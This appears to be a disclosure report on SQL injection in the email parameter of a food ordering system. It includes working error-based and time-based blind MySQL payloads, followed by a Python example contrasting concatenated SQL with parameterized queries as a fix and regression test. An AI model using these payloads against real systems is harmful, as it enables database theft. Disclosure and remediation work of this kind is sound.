Food-Ordering-System-v2.0-SQLi
Description:
The email parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the email parameter, and a database error message was returned.
Two single quotes were then submitted and the error message disappeared.
An attacker can steal all information from this system's database.
STATUS: HIGH Vulnerability
[+]Payload:
---
Parameter: email (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: email=oUTxWXtc@burpcollaborator.net' AND (SELECT 5169 FROM(SELECT COUNT(*),CONCAT(0x716b627171,(SELECT (ELT(5169=5169,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# bwyS&password=r4Q!t5u!L4
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=oUTxWXtc@burpcollaborator.net' AND (SELECT 1469 FROM (SELECT(SLEEP(3)))aKuf)# bETJ&password=r4Q!t5u!L4
---
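The quote behaviour noted in the Description (one single quote produces a database error, two do not) is what string-concatenated SQL looks like from the outside. The following is an added example, not code from the Food Ordering System or from this report. It reproduces that behaviour next to a parameterized query, where the error signal disappears. It assumes an in-memory SQLite database standing in for MySQL; the `users` table and all function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; the table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    db.execute("INSERT INTO users (email, password) VALUES (?, ?)",
               ("alice@example.test", "constructed-hash"))
    return db

def login_concatenated(db, email, password):
    # Vulnerable pattern: request values are pasted into the SQL text,
    # so a quote in `email` changes the structure of the statement.
    sql = ("SELECT id FROM users WHERE email = '" + email +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()

def login_parameterized(db, email, password):
    # Hardened pattern: values travel as bound parameters, never as SQL text.
    return db.execute("SELECT id FROM users WHERE email = ? AND password = ?",
                      (email, password)).fetchone()

def probe(login, db, email):
    # "error" if the database rejects the statement, otherwise "ok".
    try:
        login(db, email, "x")
        return "ok"
    except sqlite3.OperationalError:
        return "error"

def quote_report(login):
    # Same three inputs as the Description: no quote, one quote, two quotes.
    db = make_db()
    return {q: probe(login, db, "user@example.test" + q) for q in ("", "'", "''")}

if __name__ == "__main__":
    print("concatenated :", quote_report(login_concatenated))
    print("parameterized:", quote_report(login_parameterized))
```

The same three-input check works as a regression test after the login query is converted to bound parameters.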
